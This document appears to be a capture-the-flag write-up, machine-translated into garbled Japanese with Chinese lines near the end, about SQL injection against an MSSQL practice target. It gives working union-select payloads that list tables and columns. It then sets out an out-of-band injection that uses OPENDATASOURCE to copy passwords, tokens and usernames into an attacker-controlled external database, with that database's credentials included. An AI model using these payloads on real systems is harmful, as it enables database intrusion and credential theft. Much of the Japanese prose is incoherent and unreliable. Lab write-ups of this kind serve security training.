ツール:無料のクラウドサーバーの香港の雲します。http://www.webweb.com
匿名の電子メールを使用してサインアップします。https://bccto.me/
香港クラウドサーバーMSSQLデータベース構造、およびより大きいまたはフィールドの数に等しいテーブル管理の建設は、私たちはテーブルを取得したいです。
まず、撮影範囲を開きます。http://59.63.200.79:8015/?id=1は
、注射するかどうかを試してみてください。
クローズド;
3つのフィールド順序によってテーブルへのクエリによって。知っている人に尋ねることによっても存在するバイナリ・ラージ・オブジェクトのフィールドタイプが順にサポートされていない---そのためには、テーブルの構成が可能な限り、それの多くを構築するための4つの分野、です。
理解しやすいデータベースのテーブル名のビデオを話す、フィールド名クエリルーチン操作、第1の範囲によると、実際の噴射リバウンドが発生しないことがあります。
ルックアップテーブル名:http://59.63.200.79:8015/?id=1 %27%20union%20select%20id 、名前、ヌル%20from%20sysobjects%20where%20xtype =%27U%27 - +
テーブルのsysobjectsシステムでその名前を見つけましたが、テーブルIDが付属しています。
チャールズ管理テーブルのフィールド名:http://59.63.200.79:8015/?id=1%27%20union%20select%20id,name,null%20from%20syscolumns%20where%20id=1977058079%20--+
コンテンツのルックアップテーブル:
IDは、passwd、トークンをご覧ください。どのトークンフラグかもしれません。
そして、注入をバウンスしよう:
香港は、クラウドを登録:
アカウント:saddadsadadsa
香港パスワードを出荷:12345678
データベースライブラリ名:DB_14B8A3E_AAAAの
データベースのパスワード:12345678
データベース・リンクアドレス:SQL5006.webweb.com
データベースユーザー名:DB_14B8A3E_AAAA_admin
香港をクラウドデータベースは、データを受信するためのより大きな三つのフィールドのテーブルを作成します。
;我々はリバウンド注入データを受信するには、adminと呼ばれる4フィールドのテーブルを作成した
ステートメントを構築するために「SQLOLEDB」(OPENDATASOURCEに挿入 、「= SQL5006.webweb.comサーバー、1433; UID = DB_14B8A3E_AAAA_admin; PWD = 12345678;データベース= DB_14B8A3E_AAAA 「)管理者から選択* .DB_14B8A3E_AAAA.dbo.admin - +
実施状況:
获得flag.当然这里数据只有一条,实战中应该结合系统自代表一步步查询。
insert into opendatasource(‘sqloledb’,’server=SQL5006.webweb.com,1433;uid=DB_14B8A3E_AAAA_admin;pwd=12345678;database=DB_14B8A3E_AAAA’).DB_14B8A3E_AAAA.dbo.admin select null,null,name,null from sysobjects where xtype=’U’ —+
查询出所有用户创建表:
获得表的id。
查询admin表中字段:insert into opendatasource(‘sqloledb’,’server=SQL5006.webweb.com,1433;uid=DB_14B8A3E_AAAA_admin;pwd=12345678;database=DB_14B8A3E_AAAA’).DB_14B8A3E_AAAA.dbo.admin select * from syscolumns where id=1977058079 —+
获得字段.
获得表中数据:insert into opendatasource(‘sqloledb’,’server=SQL5006.webweb.com,1433;uid=DB_14B8A3E_AAAA_admin;pwd=12345678;database=DB_14B8A3E_AAAA’).DB_14B8A3E_AAAA.dbo.admin select%20 id,passwd,token,username from admin —+
获得flag.